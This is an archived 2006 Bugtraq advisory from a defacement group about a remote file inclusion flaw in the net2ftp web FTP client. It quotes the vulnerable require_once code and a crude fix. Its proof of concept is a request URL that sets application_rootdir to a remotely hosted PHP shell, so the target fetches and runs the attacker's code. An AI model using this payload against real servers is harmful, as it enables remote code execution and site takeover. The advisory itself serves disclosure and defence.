lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 26 Sep 2006 23:50:41 -0000
From: stormhacker@...mail.com
To: bugtraq@...urityfocus.com
Subject: net2ftp: a web based FTP client :)  <= Remote File Inclusion

+--------------------------------------------------------------------
+
+ net2ftp: a web based FTP client :)  <= Remote File Inclusion
+
+--------------------------------------------------------------------
+
+ Affected Software .: net2ftp: a web based FTP client
+ Venedor ...........: http://www.net2ftp.com
+ Class .............: Remote File Inclusion
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: rUnViRuS
+ Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/ 
+ Contact ...........: stormhacker[at]hotmail[.]com
+
+--------------------------------------------------------------------
+
+ Code index.php:
+
+ .....
+ equire_once($application_rootdir . "/includes/authorizations.inc.php");
+ require_once($application_rootdir . "/includes/bookmark.inc.php");
+ require_once($application_rootdir . "/includes/browse.inc.php");
+ require_once($application_rootdir . "/includes/database.inc.php");
+ .....
+
+--------------------------------------------------------------------
+
+ $application_rootdir is not properly sanitized before being used.
+ The bug is in the "net2ftp" Package for net2ftp.
+
+--------------------------------------------------------------------
+
+ Solution:
+ Add this line to your php-file:
+
+ $application_rootdir ="user/dir" //Your root path
+
+--------------------------------------------------------------------
+ PoC:
+ Place a PHPShell on a remote location:
+ http://wdzone.net/sh.txt?
+
+
http://[target]/index.php?application_rootdir=http://phpshell
+
+--------------------------------------------------------------------
+ [W]orld [D]efacers [T]eam
+ Greets:
+ || rUnViRuS || - || papipsycho || - || HeX || - || Linux Master || BlackWHITE ||
+ || Pro Hacker ||
+
+-------------------------[ W D T ]----------------------------------

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ